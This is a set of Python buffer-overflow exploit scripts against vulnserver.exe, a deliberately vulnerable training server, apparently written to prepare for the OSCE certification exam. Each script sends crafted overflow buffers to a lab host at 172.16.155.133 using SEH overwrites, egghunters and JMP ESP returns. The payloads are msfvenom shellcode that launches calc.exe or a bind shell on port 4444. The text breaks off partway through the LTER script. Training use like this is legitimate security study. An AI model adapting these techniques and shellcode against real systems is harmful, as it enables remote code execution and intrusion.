vulnserver.exe Buffer Overflow scripts in preparation for CTP/OSCE Exam
#!/usr/bin/python
# vulnserver.exe GMON BoF using egghunter by r00tpgp
# 9/6/2018
# In preparation for CTP/OSCE
#
import socket
import os
import sys
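host = "172.16.155.133"
port = 9999

# msfvenom -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00' -f python
# 220-byte encoded payload.  Bytes literals (b"") are used throughout so the
# script also runs under Python 3, where a str payload raises TypeError in
# send() and an implicit encode would mangle every byte >= 0x80.
buf = (
    b"\xb8\xcb\xa5\x9b\x06\xdb\xc8\xd9\x74\x24\xf4\x5a\x2b"
    b"\xc9\xb1\x31\x83\xc2\x04\x31\x42\x0f\x03\x42\xc4\x47"
    b"\x6e\xfa\x32\x05\x91\x03\xc2\x6a\x1b\xe6\xf3\xaa\x7f"
    b"\x62\xa3\x1a\x0b\x26\x4f\xd0\x59\xd3\xc4\x94\x75\xd4"
    b"\x6d\x12\xa0\xdb\x6e\x0f\x90\x7a\xec\x52\xc5\x5c\xcd"
    b"\x9c\x18\x9c\x0a\xc0\xd1\xcc\xc3\x8e\x44\xe1\x60\xda"
    b"\x54\x8a\x3a\xca\xdc\x6f\x8a\xed\xcd\x21\x81\xb7\xcd"
    b"\xc0\x46\xcc\x47\xdb\x8b\xe9\x1e\x50\x7f\x85\xa0\xb0"
    b"\x4e\x66\x0e\xfd\x7f\x95\x4e\x39\x47\x46\x25\x33\xb4"
    b"\xfb\x3e\x80\xc7\x27\xca\x13\x6f\xa3\x6c\xf8\x8e\x60"
    b"\xea\x8b\x9c\xcd\x78\xd3\x80\xd0\xad\x6f\xbc\x59\x50"
    b"\xa0\x35\x19\x77\x64\x1e\xf9\x16\x3d\xfa\xac\x27\x5d"
    b"\xa5\x11\x82\x15\x4b\x45\xbf\x77\x01\x98\x4d\x02\x67"
    b"\x9a\x4d\x0d\xd7\xf3\x7c\x86\xb8\x84\x80\x4d\xfd\x7b"
    b"\xcb\xcc\x57\x14\x92\x84\xea\x79\x25\x73\x28\x84\xa6"
    b"\x76\xd0\x73\xb6\xf2\xd5\x38\x70\xee\xa7\x51\x15\x10"
    b"\x14\x51\x3c\x73\xfb\xc1\xdc\x5a\x9e\x61\x46\xa3"
)

# 32-byte egghunter.  The four bytes \x54\x30\x30\x57 ("T00W") inside it are
# the tag it scans memory for, so the payload is prefixed with the tag twice
# ("T00WT00W").
egg = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
tag = b"T00WT00W"

# 625010B4 5B POP EBX  -- address written over the SEH handler pointer.
# NOTE(review): only the first instruction is listed; an SEH overwrite relies
# on a full POP/POP/RET sequence at this address - confirm in the debugger.
seh = b"\xB4\x10\x50\x62"
# nSEH: "jmp short +0x0d" skips the handler address and lands in the 10-byte
# NOP pad placed in front of the egghunter.
nseh = b"\xeb\x0d\x90\x90"

# Layout after the 9-byte "GMON ////" prefix (offsets relative to it):
#   NOP sled | 10 NOPs | tag | buf | nSEH @3514 | SEH @3518 | 10 NOPs | egg | NOP fill
# The sled length is derived from len(buf) so nSEH always sits at 3514.
junk = (
    b"GMON ////"
    + b"\x90" * (3518 - 4 - len(buf) - 10 - 8)
    + b"\x90" * 10
    + tag
    + buf
    + nseh
    + seh
    + b"\x90" * 10
    + egg
    + b"\x90" * (3518 - 10)
)


def send_payload(target_host, target_port, data, timeout=10):
    """Open a TCP connection to target_host:target_port, send data, close it.

    sendall() replaces send(): send() may write only part of a multi-kilobyte
    buffer and the original never checked its return value.  The socket is
    closed in a finally block so a failed connect/send does not leak it.
    Raises socket.error (OSError on Python 3) on connect/send failure.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Fail fast against an unreachable lab target instead of hanging.
        sock.settimeout(timeout)
        sock.connect((target_host, target_port))
        sock.sendall(data)
    finally:
        sock.close()


if __name__ == "__main__":
    # Optional overrides: <script> [host] [port]; defaults keep the lab target.
    target_host = sys.argv[1] if len(sys.argv) > 1 else host
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else port
    send_payload(target_host, target_port, junk)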
#!/usr/bin/python
# vulnserver.exe GMON BoF using EIP overwrite by r00tpgp
# 9/6/2018
# In preparation for CTP/OSCE
#
import socket
import os
import sys
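host = "172.16.155.133"
port = 9999

# msfvenom -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00' -f python
# 220-byte encoded payload.  Bytes literals (b"") are used throughout so the
# script also runs under Python 3, where a str payload raises TypeError in
# send() and an implicit encode would mangle every byte >= 0x80.
buf = (
    b"\xb8\xcb\xa5\x9b\x06\xdb\xc8\xd9\x74\x24\xf4\x5a\x2b"
    b"\xc9\xb1\x31\x83\xc2\x04\x31\x42\x0f\x03\x42\xc4\x47"
    b"\x6e\xfa\x32\x05\x91\x03\xc2\x6a\x1b\xe6\xf3\xaa\x7f"
    b"\x62\xa3\x1a\x0b\x26\x4f\xd0\x59\xd3\xc4\x94\x75\xd4"
    b"\x6d\x12\xa0\xdb\x6e\x0f\x90\x7a\xec\x52\xc5\x5c\xcd"
    b"\x9c\x18\x9c\x0a\xc0\xd1\xcc\xc3\x8e\x44\xe1\x60\xda"
    b"\x54\x8a\x3a\xca\xdc\x6f\x8a\xed\xcd\x21\x81\xb7\xcd"
    b"\xc0\x46\xcc\x47\xdb\x8b\xe9\x1e\x50\x7f\x85\xa0\xb0"
    b"\x4e\x66\x0e\xfd\x7f\x95\x4e\x39\x47\x46\x25\x33\xb4"
    b"\xfb\x3e\x80\xc7\x27\xca\x13\x6f\xa3\x6c\xf8\x8e\x60"
    b"\xea\x8b\x9c\xcd\x78\xd3\x80\xd0\xad\x6f\xbc\x59\x50"
    b"\xa0\x35\x19\x77\x64\x1e\xf9\x16\x3d\xfa\xac\x27\x5d"
    b"\xa5\x11\x82\x15\x4b\x45\xbf\x77\x01\x98\x4d\x02\x67"
    b"\x9a\x4d\x0d\xd7\xf3\x7c\x86\xb8\x84\x80\x4d\xfd\x7b"
    b"\xcb\xcc\x57\x14\x92\x84\xea\x79\x25\x73\x28\x84\xa6"
    b"\x76\xd0\x73\xb6\xf2\xd5\x38\x70\xee\xa7\x51\x15\x10"
    b"\x14\x51\x3c\x73\xfb\xc1\xdc\x5a\x9e\x61\x46\xa3"
)

# 17-byte "jump back" stub, executed from the NOP pad behind the SEH record:
#   d9 ee          fldz
#   d9 74 24 f4    fnstenv [esp-0xc]   ; saved FPU env puts fldz's own address on the stack
#   59             pop ecx             ; ecx = address of fldz
#   80 c1 0a       add cl, 0x0a
#   90             nop
#   fe cd          dec ch              ; -0x100
#   fe cd          dec ch              ; -0x100
#   ff e1          jmp ecx             ; ~0x1f6 bytes back, i.e. into the NOP sled ahead of buf
jumpback = b"\xd9\xee\xd9\x74\x24\xf4\x59\x80\xc1\x0a\x90\xfe\xcd\xfe\xcd\xff\xe1"

# 625010B4 5B POP EBX  -- address written over the SEH handler pointer.
# NOTE(review): only the first instruction is listed; an SEH overwrite relies
# on a full POP/POP/RET sequence at this address - confirm in the debugger.
seh = b"\xB4\x10\x50\x62"
# nSEH: "jmp short +0x19" skips the handler address and lands inside the
# 30-byte NOP pad that precedes the jump-back stub.
nseh = b"\xeb\x19\x90\x90"

# Layout after the 9-byte "GMON ////" prefix:
#   NOP sled | buf | nSEH @3514 | SEH @3518 | 30 NOPs | jumpback | "C" fill
# The header calls this an "EIP overwrite"; the nSEH/SEH pair at 3514/3518
# is the same SEH-style layout the egghunter variant uses.
junk = (
    b"GMON ////"
    + b"\x90" * (3518 - 4 - len(buf))
    + buf
    + nseh
    + seh
    + b"\x90" * 30
    + jumpback
    + b"C" * (3518 - 30 - len(jumpback))
)


def send_payload(target_host, target_port, data, timeout=10):
    """Open a TCP connection to target_host:target_port, send data, close it.

    sendall() replaces send(): send() may write only part of a multi-kilobyte
    buffer and the original never checked its return value.  The socket is
    closed in a finally block so a failed connect/send does not leak it.
    Raises socket.error (OSError on Python 3) on connect/send failure.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Fail fast against an unreachable lab target instead of hanging.
        sock.settimeout(timeout)
        sock.connect((target_host, target_port))
        sock.sendall(data)
    finally:
        sock.close()


if __name__ == "__main__":
    # Optional overrides: <script> [host] [port]; defaults keep the lab target.
    target_host = sys.argv[1] if len(sys.argv) > 1 else host
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else port
    send_payload(target_host, target_port, junk)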
#!/usr/bin/python
# vulnserver.exe GTER BoF using egghunter by r00tpgp
# 9/6/2018
# In preparation for CTP/OSCE
# The final payload is sent after a few seconds' delay so the egghunter can locate it in memory.
#
import socket
import os
import sys
import time
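host = "172.16.155.133"
port = 9999

# msfvenom -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00' -f python
# 220-byte encoded payload.  Bytes literals (b"") are used throughout so the
# script also runs under Python 3, where a str payload raises TypeError in
# send() and an implicit encode would mangle every byte >= 0x80.
buf = (
    b"\xb8\xcb\xa5\x9b\x06\xdb\xc8\xd9\x74\x24\xf4\x5a\x2b"
    b"\xc9\xb1\x31\x83\xc2\x04\x31\x42\x0f\x03\x42\xc4\x47"
    b"\x6e\xfa\x32\x05\x91\x03\xc2\x6a\x1b\xe6\xf3\xaa\x7f"
    b"\x62\xa3\x1a\x0b\x26\x4f\xd0\x59\xd3\xc4\x94\x75\xd4"
    b"\x6d\x12\xa0\xdb\x6e\x0f\x90\x7a\xec\x52\xc5\x5c\xcd"
    b"\x9c\x18\x9c\x0a\xc0\xd1\xcc\xc3\x8e\x44\xe1\x60\xda"
    b"\x54\x8a\x3a\xca\xdc\x6f\x8a\xed\xcd\x21\x81\xb7\xcd"
    b"\xc0\x46\xcc\x47\xdb\x8b\xe9\x1e\x50\x7f\x85\xa0\xb0"
    b"\x4e\x66\x0e\xfd\x7f\x95\x4e\x39\x47\x46\x25\x33\xb4"
    b"\xfb\x3e\x80\xc7\x27\xca\x13\x6f\xa3\x6c\xf8\x8e\x60"
    b"\xea\x8b\x9c\xcd\x78\xd3\x80\xd0\xad\x6f\xbc\x59\x50"
    b"\xa0\x35\x19\x77\x64\x1e\xf9\x16\x3d\xfa\xac\x27\x5d"
    b"\xa5\x11\x82\x15\x4b\x45\xbf\x77\x01\x98\x4d\x02\x67"
    b"\x9a\x4d\x0d\xd7\xf3\x7c\x86\xb8\x84\x80\x4d\xfd\x7b"
    b"\xcb\xcc\x57\x14\x92\x84\xea\x79\x25\x73\x28\x84\xa6"
    b"\x76\xd0\x73\xb6\xf2\xd5\x38\x70\xee\xa7\x51\x15\x10"
    b"\x14\x51\x3c\x73\xfb\xc1\xdc\x5a\x9e\x61\x46\xa3"
)

# 32-byte egghunter.  The four bytes \x54\x30\x30\x57 ("T00W") inside it are
# the tag it scans memory for, so the payload is prefixed with the tag twice
# ("T00WT00W").
egg = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
tag = b"T00WT00W"
nops = b"\x90" * 10

# 625011AF FFE4 JMP ESP
ret = b"\xaf\x11\x50\x62"
# "jmp short -0x3a", executed at ESP right after the JMP ESP.  58 bytes back
# is 2 (this jmp) + 4 (ret) + 10 (nops) + 32 (egg) + 10, i.e. the first byte
# of the NOP pad in front of the egghunter.
jmp_back = b"\xeb\xc6"

# Stage 1 - GTER overflow, after the 9-byte "GTER /.:/" prefix:
#   'A' pad | 10 NOPs | egg | 10 NOPs | ret @146 | jmp back | 'B' fill
junk = (
    b"GTER /.:/"
    + b"\x41" * (146 - len(egg) - 20)
    + nops
    + egg
    + nops
    + ret
    + jmp_back
    + b"\x42" * 1000
)

# Stage 2 - the tagged payload is sent on each of these commands so a copy
# ends up somewhere in process memory for the egghunter to find.  The list
# includes GTER itself, as in the original.
payload_cmds = [b"SRUN ", b"TRUN ", b"GMON ", b"GDOG ", b"KSTET ", b"GTER "]


def send_payload(target_host, target_port, data, timeout=10):
    """Open a TCP connection to target_host:target_port, send data, close it.

    sendall() replaces send(): send() may write only part of the buffer and
    the original never checked its return value.  The socket is closed in a
    finally block so a failed connect/send does not leak it.  Raises
    socket.error (OSError on Python 3) on connect/send failure.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Fail fast against an unreachable lab target instead of hanging.
        sock.settimeout(timeout)
        sock.connect((target_host, target_port))
        sock.sendall(data)
    finally:
        sock.close()


def run(target_host, target_port, delay=5):
    """Send the egghunter stage, wait `delay` seconds, then send the tagged
    payload on a second connection, one sendall() per command in payload_cmds.
    """
    send_payload(target_host, target_port, junk)
    print("waiting %d sec b4 launching payload..." % delay)
    time.sleep(delay)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.settimeout(10)
        sock.connect((target_host, target_port))
        for cmd in payload_cmds:
            sock.sendall(cmd + tag + buf)
    finally:
        sock.close()


if __name__ == "__main__":
    # Optional overrides: <script> [host] [port]; defaults keep the lab target.
    target_host = sys.argv[1] if len(sys.argv) > 1 else host
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else port
    run(target_host, target_port)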
#!/usr/bin/python
import socket
import os
import sys
import time
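host = "172.16.155.133"
port = 9999

# msfpayload windows/shell_bind_tcp lport=4444 R | msfencode -b '\x00\x0a\x0d\x20' -t c
# 368-byte bind shell, encoded to avoid NUL, LF, CR and space.  Bytes
# literals (b"") keep the payload intact under Python 3, where a str would
# raise TypeError in send() or be mangled by an implicit encode.
buf2 = (
    b"\xdd\xc4\xb8\x54\x91\x67\x9c\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
    b"\x56\x31\x43\x18\x83\xeb\xfc\x03\x43\x40\x73\x92\x60\x80\xfa"
    b"\x5d\x99\x50\x9d\xd4\x7c\x61\x8f\x83\xf5\xd3\x1f\xc7\x58\xdf"
    b"\xd4\x85\x48\x54\x98\x01\x7e\xdd\x17\x74\xb1\xde\x99\xb8\x1d"
    b"\x1c\xbb\x44\x5c\x70\x1b\x74\xaf\x85\x5a\xb1\xd2\x65\x0e\x6a"
    b"\x98\xd7\xbf\x1f\xdc\xeb\xbe\xcf\x6a\x53\xb9\x6a\xac\x27\x73"
    b"\x74\xfd\x97\x08\x3e\xe5\x9c\x57\x9f\x14\x71\x84\xe3\x5f\xfe"
    b"\x7f\x97\x61\xd6\xb1\x58\x50\x16\x1d\x67\x5c\x9b\x5f\xaf\x5b"
    b"\x43\x2a\xdb\x9f\xfe\x2d\x18\xdd\x24\xbb\xbd\x45\xaf\x1b\x66"
    b"\x77\x7c\xfd\xed\x7b\xc9\x89\xaa\x9f\xcc\x5e\xc1\xa4\x45\x61"
    b"\x06\x2d\x1d\x46\x82\x75\xc6\xe7\x93\xd3\xa9\x18\xc3\xbc\x16"
    b"\xbd\x8f\x2f\x43\xc7\xcd\x27\xa0\xfa\xed\xb7\xae\x8d\x9e\x85"
    b"\x71\x26\x09\xa6\xfa\xe0\xce\xc9\xd1\x55\x40\x34\xd9\xa5\x48"
    b"\xf3\x8d\xf5\xe2\xd2\xad\x9d\xf2\xdb\x78\x31\xa3\x73\xd2\xf2"
    b"\x13\x34\x82\x9a\x79\xbb\xfd\xbb\x81\x11\x88\xfb\x4f\x41\xd9"
    b"\x6b\xb2\x75\xcc\x37\x3b\x93\x84\xd7\x6d\x0b\x30\x1a\x4a\x84"
    b"\xa7\x65\xb8\xb8\x70\xf2\xf4\xd6\x46\xfd\x04\xfd\xe5\x52\xac"
    b"\x96\x7d\xb9\x69\x86\x82\x94\xd9\xc1\xbb\x7f\x93\xbf\x0e\xe1"
    b"\xa4\x95\xf8\x82\x37\x72\xf8\xcd\x2b\x2d\xaf\x9a\x9a\x24\x25"
    b"\x37\x84\x9e\x5b\xca\x50\xd8\xdf\x11\xa1\xe7\xde\xd4\x9d\xc3"
    b"\xf0\x20\x1d\x48\xa4\xfc\x48\x06\x12\xbb\x22\xe8\xcc\x15\x98"
    b"\xa2\x98\xe0\xd2\x74\xde\xec\x3e\x03\x3e\x5c\x97\x52\x41\x51"
    b"\x7f\x53\x3a\x8f\x1f\x9c\x91\x0b\x2f\xd7\xbb\x3a\xb8\xbe\x2e"
    b"\x7f\xa5\x40\x85\xbc\xd0\xc2\x2f\x3d\x27\xda\x5a\x38\x63\x5c"
    b"\xb7\x30\xfc\x09\xb7\xe7\xfd\x1b"
)

# Every byte value 0x01..0xff, for bad-character discovery: send it after the
# tag in place of the real payload and compare memory in the debugger.  It is
# not part of the buffers sent by this script as written.
badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

# The 32-byte egghunter as 64 hex digits: this stage is sent to HTER as hex
# text (the return address below is hex text too), unlike the raw-bytes
# hunter used by the other scripts.  Its tag is "T00W".
egg = b"6681caff0f42526a0258cd2e3c055a74efb8543030578bfaaf75eaaf75e7ffe7"

# 77D3E6E7 JMP ESP, written little-endian as hex text.
# NOTE(review): unlike the 0x625xxxxx essfunc.dll addresses the other scripts
# use, this looks like an OS DLL address; it is specific to the target's OS
# build and moves under ASLR/rebasing - re-verify before reusing.
ret = b"e7e6d377"

# Stage 1 - HTER overflow: 'A' * 2041 | ret | 5 NOPs (hex) | egghunter (hex)
junk = b"HTER " + b"A" * 2041 + ret + b"9090909090" + egg
tag = b"T00WT00W"


def send_payload(target_host, target_port, data, timeout=10):
    """Open a TCP connection to target_host:target_port, send data, close it.

    sendall() replaces send(): send() may write only part of the buffer and
    the original never checked its return value.  The socket is closed in a
    finally block so a failed connect/send does not leak it.  Raises
    socket.error (OSError on Python 3) on connect/send failure.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Fail fast against an unreachable lab target instead of hanging.
        sock.settimeout(timeout)
        sock.connect((target_host, target_port))
        sock.sendall(data)
    finally:
        sock.close()


def run(target_host, target_port, delay=1):
    """Send the egghunter stage, wait `delay` seconds, then send the tagged
    bind shell on a second HTER connection.

    The second stage is raw bytes, not hex text: it only needs to land
    somewhere in process memory for the hunter to find the "T00WT00W" tag.
    """
    send_payload(target_host, target_port, junk)
    time.sleep(delay)
    send_payload(target_host, target_port, b"HTER " + tag + buf2)


if __name__ == "__main__":
    # Optional overrides: <script> [host] [port]; defaults keep the lab target.
    target_host = sys.argv[1] if len(sys.argv) > 1 else host
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else port
    run(target_host, target_port)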
#!/usr/bin/python
# vulnserver.exe KSTET BoF by r00tpgp
# 9/6/2018
# In preparation for CTP/OSCE
# Only one tagged (T00WT00W) payload is sent, via GDOG, after the egghunter stage.
import socket
import os
import sys
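host = "172.16.155.133"
port = 9999

# msfvenom -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00' -f python
# 220-byte encoded payload.  Bytes literals (b"") are used throughout so the
# script also runs under Python 3, where a str payload raises TypeError in
# send() and an implicit encode would mangle every byte >= 0x80.
buf = (
    b"\xb8\xcb\xa5\x9b\x06\xdb\xc8\xd9\x74\x24\xf4\x5a\x2b"
    b"\xc9\xb1\x31\x83\xc2\x04\x31\x42\x0f\x03\x42\xc4\x47"
    b"\x6e\xfa\x32\x05\x91\x03\xc2\x6a\x1b\xe6\xf3\xaa\x7f"
    b"\x62\xa3\x1a\x0b\x26\x4f\xd0\x59\xd3\xc4\x94\x75\xd4"
    b"\x6d\x12\xa0\xdb\x6e\x0f\x90\x7a\xec\x52\xc5\x5c\xcd"
    b"\x9c\x18\x9c\x0a\xc0\xd1\xcc\xc3\x8e\x44\xe1\x60\xda"
    b"\x54\x8a\x3a\xca\xdc\x6f\x8a\xed\xcd\x21\x81\xb7\xcd"
    b"\xc0\x46\xcc\x47\xdb\x8b\xe9\x1e\x50\x7f\x85\xa0\xb0"
    b"\x4e\x66\x0e\xfd\x7f\x95\x4e\x39\x47\x46\x25\x33\xb4"
    b"\xfb\x3e\x80\xc7\x27\xca\x13\x6f\xa3\x6c\xf8\x8e\x60"
    b"\xea\x8b\x9c\xcd\x78\xd3\x80\xd0\xad\x6f\xbc\x59\x50"
    b"\xa0\x35\x19\x77\x64\x1e\xf9\x16\x3d\xfa\xac\x27\x5d"
    b"\xa5\x11\x82\x15\x4b\x45\xbf\x77\x01\x98\x4d\x02\x67"
    b"\x9a\x4d\x0d\xd7\xf3\x7c\x86\xb8\x84\x80\x4d\xfd\x7b"
    b"\xcb\xcc\x57\x14\x92\x84\xea\x79\x25\x73\x28\x84\xa6"
    b"\x76\xd0\x73\xb6\xf2\xd5\x38\x70\xee\xa7\x51\x15\x10"
    b"\x14\x51\x3c\x73\xfb\xc1\xdc\x5a\x9e\x61\x46\xa3"
)

# 625011AF FFE4 JMP ESP
ret = b"\xAF\x11\x50\x62"
# "jmp short -0x47", executed at ESP right after the JMP ESP.  71 bytes back
# is 2 (this jmp) + 4 (ret) + 65 (egg + 'A' pad), i.e. exactly the first
# byte of the egghunter.
shortjmp = b"\xeb\xb9\x90\x90"

# 32-byte egghunter.  The four bytes \x54\x30\x30\x57 ("T00W") inside it are
# the tag it scans memory for, so the payload is prefixed with the tag twice
# ("T00WT00W").
egg = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
tag = b"T00WT00W"

# KSTET egghunter stage, after the 11-byte "KSTET /.://" prefix:
#   egg | 'A' pad to 65 | ret @65 | short jmp | 'C' fill
# NOTE(review): this stage is built but never sent by this script, exactly
# as in the original - only the GDOG payload below goes out.  The header
# says the tagged payload is sent *after* the egghunter, so the hunter is
# presumably delivered separately (the companion KSTET script sends it on
# the same connection).  Confirm the intended sequencing.
junk = (
    b"KSTET /.://"
    + egg
    + b"\x41" * (65 - len(egg))
    + ret
    + shortjmp
    + b"\x43" * 100
)


def send_payload(target_host, target_port, data, timeout=10):
    """Open a TCP connection to target_host:target_port, send data, close it.

    sendall() replaces send(): send() may write only part of the buffer and
    the original never checked its return value.  The socket is closed in a
    finally block so a failed connect/send does not leak it.  Raises
    socket.error (OSError on Python 3) on connect/send failure.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Fail fast against an unreachable lab target instead of hanging.
        sock.settimeout(timeout)
        sock.connect((target_host, target_port))
        sock.sendall(data)
    finally:
        sock.close()


if __name__ == "__main__":
    # Optional overrides: <script> [host] [port]; defaults keep the lab target.
    target_host = sys.argv[1] if len(sys.argv) > 1 else host
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else port
    # Tagged payload delivered via GDOG for the (separately sent) hunter to find.
    send_payload(target_host, target_port, b"GDOG " + tag + buf)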
#!/usr/bin/python
# vulnserver.exe KSTET BoF by r00tpgp
# 9/6/2018
# In preparation for CTP/OSCE
# Several copies of the final payload are sent immediately after the egghunter, on the same connection.
# Oddly, this one works immediately, without the delay the GTER script needs.
#
import socket
import os
import sys
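host = "172.16.155.133"
port = 9999

# msfvenom -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00' -f python
# 220-byte encoded payload.  Bytes literals (b"") are used throughout so the
# script also runs under Python 3, where a str payload raises TypeError in
# send() and an implicit encode would mangle every byte >= 0x80.
buf = (
    b"\xb8\xcb\xa5\x9b\x06\xdb\xc8\xd9\x74\x24\xf4\x5a\x2b"
    b"\xc9\xb1\x31\x83\xc2\x04\x31\x42\x0f\x03\x42\xc4\x47"
    b"\x6e\xfa\x32\x05\x91\x03\xc2\x6a\x1b\xe6\xf3\xaa\x7f"
    b"\x62\xa3\x1a\x0b\x26\x4f\xd0\x59\xd3\xc4\x94\x75\xd4"
    b"\x6d\x12\xa0\xdb\x6e\x0f\x90\x7a\xec\x52\xc5\x5c\xcd"
    b"\x9c\x18\x9c\x0a\xc0\xd1\xcc\xc3\x8e\x44\xe1\x60\xda"
    b"\x54\x8a\x3a\xca\xdc\x6f\x8a\xed\xcd\x21\x81\xb7\xcd"
    b"\xc0\x46\xcc\x47\xdb\x8b\xe9\x1e\x50\x7f\x85\xa0\xb0"
    b"\x4e\x66\x0e\xfd\x7f\x95\x4e\x39\x47\x46\x25\x33\xb4"
    b"\xfb\x3e\x80\xc7\x27\xca\x13\x6f\xa3\x6c\xf8\x8e\x60"
    b"\xea\x8b\x9c\xcd\x78\xd3\x80\xd0\xad\x6f\xbc\x59\x50"
    b"\xa0\x35\x19\x77\x64\x1e\xf9\x16\x3d\xfa\xac\x27\x5d"
    b"\xa5\x11\x82\x15\x4b\x45\xbf\x77\x01\x98\x4d\x02\x67"
    b"\x9a\x4d\x0d\xd7\xf3\x7c\x86\xb8\x84\x80\x4d\xfd\x7b"
    b"\xcb\xcc\x57\x14\x92\x84\xea\x79\x25\x73\x28\x84\xa6"
    b"\x76\xd0\x73\xb6\xf2\xd5\x38\x70\xee\xa7\x51\x15\x10"
    b"\x14\x51\x3c\x73\xfb\xc1\xdc\x5a\x9e\x61\x46\xa3"
)

# 625011AF FFE4 JMP ESP
ret = b"\xAF\x11\x50\x62"
# "jmp short -0x47", executed at ESP right after the JMP ESP.  71 bytes back
# is 2 (this jmp) + 4 (ret) + 65 (egg + 'A' pad), i.e. exactly the first
# byte of the egghunter.
shortjmp = b"\xeb\xb9\x90\x90"

# 32-byte egghunter.  The four bytes \x54\x30\x30\x57 ("T00W") inside it are
# the tag it scans memory for, so the payload is prefixed with the tag twice
# ("T00WT00W").
egg = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
tag = b"T00WT00W"

# KSTET egghunter stage, after the 11-byte "KSTET /.://" prefix:
#   egg | 'A' pad to 65 | ret @65 | short jmp | 'C' fill
junk = (
    b"KSTET /.://"
    + egg
    + b"\x41" * (65 - len(egg))
    + ret
    + shortjmp
    + b"\x43" * 100
)

# The tagged payload is sent on every one of these commands, on the same
# connection as the hunter, so a copy lands in process memory for it to find.
vulnserver = [
    b"STATS ", b"GDOG ", b"KTIME ", b"LTIME ", b"SRUN ", b"TRUN ",
    b"GMON ", b"GTER ", b"HTER ", b"LTER ", b"KSTAN ",
]


def run(target_host, target_port, timeout=10):
    """Send the KSTET egghunter stage, then the tagged payload on each command
    in `vulnserver`, all on one TCP connection.

    sendall() replaces send(): send() may write only part of the buffer and
    the original never checked its return value.  The socket is closed in a
    finally block so a failed connect/send does not leak it.  Raises
    socket.error (OSError on Python 3) on connect/send failure.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Fail fast against an unreachable lab target instead of hanging.
        sock.settimeout(timeout)
        sock.connect((target_host, target_port))
        sock.sendall(junk)
        for cmd in vulnserver:
            sock.sendall(cmd + tag + buf)
    finally:
        sock.close()


if __name__ == "__main__":
    # Optional overrides: <script> [host] [port]; defaults keep the lab target.
    target_host = sys.argv[1] if len(sys.argv) > 1 else host
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else port
    run(target_host, target_port)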
#!/usr/bin/python
# vulnserver.exe LTER BoF by r00tpgp
# 9/6/2018
# In preparation for CTP/OSCE
# You need to discover the bad characters first and omit them from the user-defined buffer.
#
import socket
import os
import sys
import time
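host = "172.16.155.133"
port = 9999

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/alpha_mixed BufferRegister=ESP -f c
# 710-byte alphanumeric bind shell.  BufferRegister=ESP means the decoder
# stub assumes ESP points at the payload, which holds here because control
# arrives through a JMP ESP with buf placed right after the return address.
# Bytes literals (b"") keep the payload intact under Python 3.
buf = (
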